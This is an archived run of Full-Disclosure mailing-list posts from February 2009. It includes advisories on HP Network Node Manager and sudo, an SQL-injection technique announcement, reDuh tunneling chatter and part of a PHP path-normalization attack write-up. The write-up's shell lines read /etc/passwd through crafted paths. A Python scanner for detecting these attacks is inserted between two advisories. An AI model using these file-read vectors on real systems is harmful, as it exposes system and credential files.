Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/9be68db4/attachment.bin From andy.mcknight at gmail.com Fri Feb 6 18:20:08 2009 From: andy.mcknight at gmail.com (Andy McKnight) Date: Fri, 6 Feb 2009 18:20:08 +0000 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> Message-ID: 2009/2/6 Miller Grey > ...knowing all this, how does it get fixed? What is the proper way for MS > to enforce UAC? > They need to put a version of UAC in place that will alert the user when a process is trying to make a change that weakens the overall security posture of the box. They need *only* alert the user when this change is with malicious intent. They need to elimiate all false positives. Good luck with that. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/b3982a8e/attachment.html From labs-no-reply at idefense.com Fri Feb 6 20:18:50 2009 
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 06 Feb 2009 15:18:50 -0500
Subject: [Full-disclosure] iDefense Security Advisory 02.06.09: HP Network Node Manager Multiple Command Injection Vulnerabilities
Message-ID: <498C9B2A.2050401@idefense.com>

iDefense Security Advisory 02.06.09
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 06, 2009

I. BACKGROUND

HP Network Node Manager (NNM) is an application suite that is used to map out and manage network topography. NNM runs on a variety of platforms, including Linux and multiple versions of Windows. For more information, see the vendor's site found at the following link.

http://www.openview.hp.com/products/nnm/index.html

II. DESCRIPTION

Remote exploitation of multiple command injection vulnerabilities in Hewlett-Packard Development Co. LP (HP)'s Network Node Manager could allow an attacker to execute arbitrary code with the privileges of the affected service.

Multiple command injection vulnerabilities are present in NNM CGI applications. The vulnerabilities are very similar and occur in the webappmon.exe and OpenView5.exe programs. Part of the functionality of these applications is to start other programs and collect their output. In order to perform this, they each execute external programs along with any attacker controllable arguments for the application. The arguments may contain shell meta-characters. This allows an attacker to run arbitrary shell commands. The arguments are not filtered before being passed to the external program. This results in attacker supplied commands being run on the host.

III. ANALYSIS

Exploitation of these vulnerabilities results in the execution of arbitrary code with the privileges of the affected service. On RedHat Enterprise 4, the application is started as the user 'bin'. All that is required for exploitation is the ability to create a TCP connection to port 80 on the targeted host.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities in Network Node Manager version 7.53 for Linux. Previous versions, as well as versions for other Unix based operating systems, may also be affected.

V. WORKAROUND

By default, the NNM CGI applications do not require a user to be authenticated. By changing the session.conf file and setting UserLogin to ON, it is possible to require valid credentials in order to run. The 'ovhtpasswd' application can then be used to add valid credentials to the password file.

VI. VENDOR RESPONSE

HP has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01661610

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4559 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

06/19/2008 Initial Contact
06/19/2008 Vendor Case numbers set
07/10/2008 PoC sent
01/22/2009 Vendor says patch is ready
02/05/2009 Requested CVE from vendor
02/05/2009 Requested date coordination
02/06/2009 Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
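As an added, defender-side example (not part of the advisory, and not HP's or iDefense's code): a scanner over web server access logs that flags requests to the two CGI programs named in the advisory whose decoded query parameters carry shell metacharacters, the condition the advisory describes as unfiltered arguments reaching an external program. The log lines, the /cgi-bin/ prefix, the hosts and the parameter names are constructed for this example; the advisory does not give NNM's real parameter names.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# CGI programs named in the advisory, matched case-insensitively on the
# final path component so the install prefix does not matter.
NNM_CGIS = ("webappmon.exe", "openview5.exe")

# Characters that let one argument turn into several shell commands when
# a CGI hands user input to a shell without filtering.
SHELL_META = re.compile(r"[;&|`$<>\r\n]")

# Apache/NCSA common log format; other formats only need a new regex here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (hypothetical hosts, paths and parameter names).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Feb/2009:15:18:50 -0500] "GET /cgi-bin/webappmon.exe?app=snmp&node=host1 HTTP/1.1" 200 1234',
    '10.0.0.9 - - [06/Feb/2009:15:19:02 -0500] "GET /cgi-bin/webappmon.exe?app=snmp&node=host1%3Bid HTTP/1.1" 200 512',
    '10.0.0.9 - - [06/Feb/2009:15:19:07 -0500] "GET /cgi-bin/OpenView5.exe?Target=host1%257Cid HTTP/1.1" 200 512',
    '10.0.0.7 - - [06/Feb/2009:15:20:11 -0500] "GET /cgi-bin/other.cgi?q=a%7Cb HTTP/1.1" 200 99',
    'garbage line that does not parse',
]


def parse_line(line):
    """Split one access-log line into its fields; None if it is malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target):
    """Return [(name, decoded_value)] for NNM CGI requests whose parameters
    contain shell metacharacters; [] for other CGIs or clean requests."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(NNM_CGIS):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes one layer of %XX; a second unquote() catches
        # double-encoded values such as %253B (-> %3B -> ';').
        decoded = unquote(value)
        if SHELL_META.search(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Return one alert dict per log line that targets an NNM CGI with
    shell metacharacters in its query string."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line: skip it rather than abort the scan
        hits = suspicious_params(rec["target"])
        if hits:
            alerts.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "cgi": urlsplit(rec["target"]).path.rsplit("/", 1)[-1],
                "params": hits,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The same check, applied to the decoded query string before the CGI builds its command line, is the allow-list style filter the advisory says was missing; on the detection side, pair it with the session.conf UserLogin workaround so hits come from identified users.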
From labs-no-reply at idefense.com Fri Feb 6 21:19:34 2009
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 06 Feb 2009 16:19:34 -0500
Subject: [Full-disclosure] iDefense Security Advisory 02.06.09: HP Network Node Manager ovlaunch CGI BSS Overflow Vulnerability
Message-ID: <498CA966.8000303@idefense.com>

iDefense Security Advisory 02.06.09
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 06, 2009

I. BACKGROUND

HP Network Node Manager (NNM) is an application suite that is used to map out and manage network topography. NNM runs on a variety of platforms, including Linux and multiple versions of Windows. For more information, see the vendor's site found at the following link.

http://www.openview.hp.com/products/nnm/index.html

II. DESCRIPTION

Remote exploitation of a BSS based buffer overflow vulnerability in Hewlett-Packard Development Co. LP (HP)'s Network Node Manager could allow an attacker to execute arbitrary code with the privileges of the affected service.

The vulnerability exists within the 'ovlaunch' CGI application, which is used to launch the remote user interface. By sending a specially crafted request, it is possible to trigger a buffer overflow. The vulnerability results from an unchecked function call. The buffer that is overflowed makes it possible to overwrite various pointers that are located after the buffer in memory.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service. IIS runs CGI applications with reduced privileges, so a full system compromise is not possible using only this vulnerability.

In iDefense Labs testing, it was possible to overwrite various pointers stored after the overflowed buffer. Given this, code execution is likely to be possible.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Network Node Manager version 7.53 for Windows. Previous versions may also be affected.

The Linux version of 'ovlaunch' contains the vulnerable code, but it is not triggered. The actual hostname is used instead of the attacker supplied 'Host' parameter.

V. WORKAROUND

Requiring authentication by modifying the session.conf file is not a valid workaround for this vulnerability. The vulnerability occurs during the parsing of requests, before any authentication checks.

However, it is possible to use the IIS configuration manager to require authentication in order to execute the ovlaunch CGI. Additionally, the IIS configuration manager can be used to limit connections by IP address.

VI. VENDOR RESPONSE

Hewlett-Packard Development Co. LP (HP) has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01661610

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4562 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

06/19/2008 Initial Contact
06/19/2008 Vendor Case # SSRT080092 set
07/10/2008 PoC sent
01/22/2009 Vendor says patch is ready
02/05/2009 Requested CVE
02/05/2009 Requested date coordination
02/06/2009 Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From labs-no-reply at idefense.com Fri Feb 6 21:00:05 2009
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 06 Feb 2009 16:00:05 -0500
Subject: [Full-disclosure] iDefense Security Advisory 02.06.09: HP Network Node Manager Multiple Information Disclosure Vulnerabilities
Message-ID: <498CA4D5.40109@idefense.com>

iDefense Security Advisory 02.06.09
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 06, 2009

I. BACKGROUND

HP Network Node Manager (NNM) is an application suite that is used to map out and manage network topography. NNM runs on a variety of platforms, including Linux and multiple versions of Windows. For more information, see the vendor's site found at the following link.

http://www.openview.hp.com/products/nnm/index.html

II. DESCRIPTION

Remote exploitation of multiple information disclosure vulnerabilities in Hewlett-Packard Development Co. LP (HP)'s Network Node Manager could allow an attacker to gain access to sensitive information.

Two vulnerabilities exist within the CGI applications distributed with NNM.

The first vulnerability exists in the nnmRptConfig.exe CGI application. When responding to specifically crafted requests, the CGI will disclose the location of log directories.

The second vulnerability exists within the ovlaunch.exe CGI. If a parameter is incorrectly set in a specific request, the application will return various configuration details.

III. ANALYSIS

Exploitation of these vulnerabilities results in the disclosure of sensitive information. While the direct effects of these vulnerabilities are minimal, they may be useful to an attacker attempting to exploit other vulnerabilities.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities in Network Node Manager version 7.53 for Linux and Windows. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for these issues.

VI. VENDOR RESPONSE

Hewlett-Packard has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01661610

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4560 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

06/19/2008 Initial Contact
06/19/2008 Vendor Case # SSRT080095 set
07/10/2008 PoC sent
01/22/2009 Vendor says patch is ready
02/05/2009 Requested CVE from vendor
02/05/2009 Requested date coordination
02/06/2009 Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From krymson at gmail.com Fri Feb 6 22:22:21 2009
From: krymson at gmail.com (Michael Krymson)
Date: Fri, 6 Feb 2009 16:22:21 -0600
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: <88499.1233944099@turing-police.cc.vt.edu>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> <88499.1233944099@turing-police.cc.vt.edu>
Message-ID:

I'm with Valdis on this one. You have to understand that Windows is probably as popular as it is now very largely *because* of the freedom the OS offered people *and* software makers to do what they want with it. This is not entirely different from DRM vs Unrestricted media...

In order for Microsoft to do anything proper about it, they would have to splinter their market and either piss off software makers that depend upon the ease of use, or piss off users who want freedom to put whatever app they want on their system or make whatever changes without aggravation. And any major off-putting change would give many people and businesses a reason to explore alternatives...

One thing in our (and Microsoft's) favor towards securing the end user experience is the growing number of people who realize two things. It's their own fault when their system gets stupidly slow because Windows lets them be stupid. And as people "grow up" into computers they realize they only really do 10 things on them and only really need 10 different apps.

On Fri, Feb 6, 2009 at 12:14 PM, wrote:
> On Fri, 06 Feb 2009 12:02:56 CST, Miller Grey said:
>
> > ...knowing all this, how does it get fixed? What is the proper way for MS
> > to enforce UAC?
>
> I'm quite frankly not convinced that there is in fact any economically feasible
> way for MS to ship a "proper" UAC.

From keytoaster at gentoo.org Fri Feb 6 22:21:57 2009
From: keytoaster at gentoo.org (Tobias Heinlein)
Date: Fri, 06 Feb 2009 23:21:57 +0100
Subject: [Full-disclosure] [ GLSA 200902-01 ] sudo: Privilege escalation
Message-ID: <498CB805.6030803@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            Gentoo Linux Security Advisory                           GLSA 200902-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: sudo: Privilege escalation
      Date: February 06, 2009
      Bugs: #256633
        ID: 200902-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in sudo may allow for privilege escalation.

Background
==========

sudo allows a system administrator to give users the ability to run commands as other users.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-admin/sudo            < 1.7.0                         >= 1.7.0

Description
===========

Harald Koenig discovered that sudo incorrectly handles group specifications in Runas_Alias (and related) entries when a group is specified in the list (using %group syntax, to allow a user to run commands as any member of that group) and the user is already a member of that group.

Impact
======

A local attacker could possibly run commands as an arbitrary system user (including root).

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All sudo users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.7.0"

References
==========

  [ 1 ] CVE-2009-0034
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200902-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From dani at kachakil.com Sat Feb 7 16:02:21 2009
From: dani at kachakil.com (Daniel Kachakil)
Date: Sat, 7 Feb 2009 17:02:21 +0100
Subject: [Full-disclosure] SFX-SQLi: A new SQL injection technique for SQL Server (dumps a table in one request!)
Message-ID: <08BED96B74184FB588ABC2C7DBA89B23@DK>

Hi,

I am glad to release SFX-SQLi (Select For XML SQL injection), a new SQL injection technique which allows extracting the whole information of a Microsoft SQL Server 2005/2008 database in an extremely fast and efficient way.

This technique is based on the FOR XML clause, which is able to convert the content of a table into a single string, so its contents could be appended to some field by injecting a subquery into a vulnerable input of a web application. In most cases, this method can dump all the contents of any table using only ONE REQUEST to the web server, without the need of any special permission on the DBMS.

I have written a paper describing how the technique works and on which fundamentals it is based, and I have also developed a tool which implements this technique as a proof of concept (with the source code included).

You can get them through this URL:

http://www.kachakil.com/papers/SFX-SQLi-en.htm

Regards,
  Daniel Kachakil

From seclists at 126.com Sat Feb 7 16:42:57 2009
From: seclists at 126.com (seclists)
Date: Sun, 8 Feb 2009 00:42:57 +0800 (CST)
Subject: [Full-disclosure] SFX-SQLi: A new SQL injection technique for SQL Server (dumps a table in one request!)
In-Reply-To: <08BED96B74184FB588ABC2C7DBA89B23@DK>
References: <08BED96B74184FB588ABC2C7DBA89B23@DK>
Message-ID: <2261092.319271234024977639.JavaMail.coremail@bj126app25.126.com>

The Chinese version MSSQL Injection FOR MSSQL 2005 & 2008 can be found at http://www.pcsec.org/archives/SFX-SQLi-A-new-SQL-injection-technique-for-MSSQL-dumps-a-table-in-one-request.html

On 2009-02-08 00:02:21, "Daniel Kachakil" wrote:
>Hi,
>
>I am glad to release SFX-SQLi (Select For XML SQL injection), a new SQL
>injection technique which allows extracting the whole information of a
>Microsoft SQL Server 2005/2008 database in an extremely fast and efficient
>way.
>
>This technique is based on the FOR XML clause, which is able to convert the
>content of a table into a single string, so its contents could be appended
>to some field by injecting a subquery into a vulnerable input of a web
>application. In most cases, this method can dump all the contents of any
>table using only ONE REQUEST to the web server, without the need of any
>special permission on the DBMS.
>
>I have written a paper describing how the technique works and on which
>fundamentals it is based, and I have also developed a tool which implements
>this technique as a proof of concept (with the source code included).
>
>You can get them through this URL:
>
>http://www.kachakil.com/papers/SFX-SQLi-en.htm
>
>Regards,
>  Daniel Kachakil
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

From seclists at 126.com Sat Feb 7 18:16:27 2009
From: seclists at 126.com (seclists)
Date: Sun, 8 Feb 2009 02:16:27 +0800 (CST)
Subject: [Full-disclosure] About reDuh
Message-ID: <3665359.322741234030587804.JavaMail.coremail@bj126app25.126.com>

You can download reDuh Server Pages (PHP/ASP/JSP) from http://www.sensepost.com/research/reDuh/.
Has anyone tested the aspx & php versions? Please try whether they work.

From handrix at gmail.com Sat Feb 7 19:26:37 2009
From: handrix at gmail.com (Handrix)
Date: Sat, 7 Feb 2009 19:26:37 +0000
Subject: [Full-disclosure] About reDuh
In-Reply-To: <3665359.322741234030587804.JavaMail.coremail@bj126app25.126.com>
References: <3665359.322741234030587804.JavaMail.coremail@bj126app25.126.com>
Message-ID:

Hello,

Well, I tried out reDuh, exactly the jsp version, and it worked fine for me.

Good job,

Best regards,

2009/2/7 seclists
> You can download reDuh Server Pages from
> http://www.sensepost.com/research/reDuh/.(PHP/ASP/JSP)
> Any one have tested the aspx & php version ? Plz try whether it work.
>

-- 
Ali MEZGANI
Network Engineering/Security
http://securfox.blogspot.com/

From seclists at 126.com Sat Feb 7 20:08:07 2009
From: seclists at 126.com (seclists)
Date: Sun, 8 Feb 2009 04:08:07 +0800 (CST)
Subject: [Full-disclosure] About reDuh
In-Reply-To:
References: <3665359.322741234030587804.JavaMail.coremail@bj126app25.126.com>
Message-ID: <16764046.325181234037287426.JavaMail.coremail@bj126app25.126.com>

Yes, I tried out the reDuh jsp version too, it worked fine.
But the aspx and php versions can't work.

On 2009-02-08 03:26:37, Handrix wrote:
> Hello,
>
> Well, I tried out reDuh, exactly the jsp version, and it worked fine for me.
>
> Good job,
>
> Best regards,
>
> 2009/2/7 seclists
> > You can download reDuh Server Pages from
> > http://www.sensepost.com/research/reDuh/.(PHP/ASP/JSP)
> > Any one have tested the aspx & php version ? Plz try whether it work.
>
> -- 
> Ali MEZGANI
> Network Engineering/Security
> http://securfox.blogspot.com/

From haroon at sensepost.com Sat Feb 7 20:45:28 2009
From: haroon at sensepost.com (Haroon Meer)
Date: Sat, 7 Feb 2009 22:45:28 +0200
Subject: [Full-disclosure] About reDuh
In-Reply-To: <16764046.325181234037287426.JavaMail.coremail@bj126app25.126.com>
References: <3665359.322741234030587804.JavaMail.coremail@bj126app25.126.com> <16764046.325181234037287426.JavaMail.coremail@bj126app25.126.com>
Message-ID: <20090207204528.GV4706@stewie.sensepost.com>

Hi..

* seclists [seclists at 126.com] seemed to say:
> Yes, I tried out the reDuh jsp version too, it worked fine.
> But the aspx and php versions can't work.
> On 2009-02-08 03:26:37, Handrix wrote:
> Well, I tried out reDuh, exactly the jsp version, and it worked fine for me.
> Good job,

Drop those SensePost guys an email at research at sensepost.com and tell them how it's blowing up.. I have it on pretty good authority they would love to help..

/mh

-- 
Haroon Meer, SensePost Information Security | http://www.sensepost.com/blog/
PGP: http://www.sensepost.com/pgp/haroon.txt | Tel: +27 83786 6637

From seclists at 126.com Sun Feb 8 00:20:10 2009
From: seclists at 126.com (seclists)
Date: Sun, 8 Feb 2009 08:20:10 +0800 (CST)
Subject: [Full-disclosure] About reDuh
In-Reply-To: <20090207233941.GA4706@stewie.sensepost.com>
References: <20090207233941.GA4706@stewie.sensepost.com> <4785957.325961234039975683.JavaMail.coremail@bj126app25.126.com>
Message-ID: <30175509.329451234052410344.JavaMail.coremail@bj126app60.126.com>

Thx for your kind help, bro. The jsp version of reDuh is powerful, so cool.

On 2009-02-08 07:39:41, "Haroon Meer" wrote:
>Hi..
>
>* seclists [seclists at 126.com] seemed to say:
>> Hi, bro
>> Thx for sharing reDuh. I have downloaded reDuh (asp/php/jsp) and ReDuhClient from http://www.sensepost.com/research/reDuh.
>> Then I have tried it in my vmware; Reduh.jsp can work fine, but ReDuh.aspx can't.
>> I typed the command "java reDuhClient 192.168.8.102 80 /reDuh.aspx", and it returned an error.
>>
>>[Info]Querying remote JSP for usable remote RPC port
>>[Error] Tried to find a remote RPC port in the range 42000 to 42050 but no attempts were successful. Sorry it didn't work out.
>>
>> What is required to let ReDuh.aspx work, please?
>> My environment:
>> windows 2003 Enterprise edition Sp2(Chinese)
>> IIS 6.0
>> ASP.NET Version is 2.0.50727
>
>I seem to recall this exact error coming up in the past, and having been
>resolved by ian at sensepost.com.
>
>He will send you an email early next week with a little note on how to
>fix it.
>
>Thanks for using it, and please let us know if you have any other
>questions..
>
>Thanks
>
>/mh
>
>-- 
>Haroon Meer, SensePost Information Security | http://www.sensepost.com/blog/
>PGP: http://www.sensepost.com/pgp/haroon.txt | Tel: +27 83786 6637

From pschmehl_lists at tx.rr.com Sun Feb 8 04:10:59 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Sat, 07 Feb 2009 22:10:59 -0600
Subject: [Full-disclosure] SFX-SQLi: A new SQL injection technique for SQL Server (dumps a table in one request!)
In-Reply-To: <08BED96B74184FB588ABC2C7DBA89B23@DK>
References: <08BED96B74184FB588ABC2C7DBA89B23@DK>
Message-ID:

--On February 7, 2009 10:02:21 AM -0600 Daniel Kachakil wrote:
>
> I have written a paper describing how the technique works and on which
> fundamentals it is based, and I have also developed a tool which
> implements
> this technique as a proof of concept (with the source code included).
>
> You can get them through this URL:
>
> http://www.kachakil.com/papers/SFX-SQLi-en.htm

Having read your paper, I'm a bit confused about what you think the "new SQL injection technique" is that you've discovered. I understand you have determined a way to *extract* data in a more compact and efficient format, but I didn't see any new *injection* technique. IOW, the FOR XML construct isn't going to assist you in obtaining the data - only in obtaining it more efficiently.

Did I miss something?

Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer.
******************************************
WARNING: Check the headers before replying

From ascii at katamail.com Sun Feb 8 10:53:22 2009
From: ascii at katamail.com (ascii) Date: Sun, 08 Feb 2009 10:53:22 +0000 Subject: [Full-disclosure] PHP filesystem attack vectors Message-ID: <498EB9A2.9030206@katamail.com> PHP filesystem attack vectors Name PHP filesystem attack vectors Systems Affected PHP and PHP+Suhosin Vendor http://www.php.net/ Advisory http://www.ush.it/team/ush/hack-phpfs/phpfs_mad.txt Authors Francesco "ascii" Ongaro (ascii AT ush DOT it) Giovanni "evilaliv3" Pellerano (giovanni.pellerano AT evilaliv3 DOT org) Date 20090207 I) Introduction II) The bugs in 50 words III) PHP filesystem functions path normalization attack IV) PHP filesystem functions path normalization attack details V) PHP filesystem functions path truncation attack VI) PHP filesystem functions path truncation attack details VII) The facts VIII) POC and attack code IX) Conclusions X) References I) Introduction On Apr 07, 2008 I spoke with Kuza55 and Wisec about an attack I found some time before that was a new attack vector for filesystem functions (fopen, (include|require)[_once]?, file_(put|get)_contents, etc) for the PHP language. It was a path normalization issue and I asked them to keep it "secret" [4], this was a good idea cause my analisys was mostly incomplete and erroneous but the idea was good and the bug was real and disposable. Later on Dec 24, 2008 on sla.ckers.org barbarianbob showed a path truncation attack against PHP that is partially based on mine attack. He discovered the bugs indipendently so he deserves full credits for them and his findings were dissected partially by Pragmatk on [2] and [3]. Sadly, or luckily, only the surface of these important issues has been analyzed and that's why we at ush.it are releasing this article: to bring complete light on them and present some additional juice. 
II) The bugs in 50 words

As previously indicated there are two different bugs: the first, which I discovered in April 2008, can be used independently for some purposes; the second, discovered by barbarianbob, builds on the first to achieve a better goal. Let's see the details.

- PHP filesystem functions path normalization attack

  PHP normalizes / and /. in path names, allowing for example /etc/passwd/ or /etc/passwd/. to be successfully opened as a file.

- PHP filesystem functions path truncation attack

  PHP has a path truncation issue (an unchecked snprintf() call that silently truncates) allowing only MAXPATHLEN chars to be evaluated when actually opening a file or directory.

III) PHP filesystem functions path normalization attack

Normally one would expect that to open a file its path must be issued correctly:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'include("/etc/passwd");' | head -n1
root:x:0:0:root:/root:/bin/bash
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

While all of us are aware that some path normalizations are normal:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ cat /etc//passwd | head -n1
root:x:0:0:root:/root:/bin/bash
$ cat /etc/./passwd | head -n1
root:x:0:0:root:/root:/bin/bash
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PHP does far more than what we are likely to expect:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
php -r 'include("/etc/passwd/");'
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As you can see the file is successfully included (it works with every single PHP filesystem function that makes use of _php_stream_fopen() and similar functions). This is also part of the vector discovered by barbarianbob, although he uses it for purposes different from what I initially had in mind.
But with vanilla PHP (the official source tree) it will not work and you'll get an error complaining that the target is not a directory. Why? Because barbarianbob, everybody who ran it successfully, and me in my initial disclosure [4] were using a patched PHP (for example Suhosin, loaded as .so or "built-in", or Ubuntu's PHP, which is patched with Suhosin, etc.). We learned this through deep and extensive testing and observation plus some code navigation and gdb magic, with the help of evilaliv3 and Wisec.

To overcome this limitation we came up with the universal path normalization vector for PHP, which is not a single "/" but "/.". This is a case in which a single char really changes things.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
php -r 'include("/etc/passwd/.");'
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This doesn't happen under normal circumstances:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ cat /etc/passwd/.
cat: /etc/passwd/.: Not a directory
$ cat /etc/passwd/
cat: /etc/passwd/: Not a directory
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

We were already aware that these "neutral" chars can be repeated many times without affecting the result (the first form only on patched PHP, as explained below):

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
php -r 'include("/etc/passwd//////");'
php -r 'include("/etc/passwd/./././././.");'
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

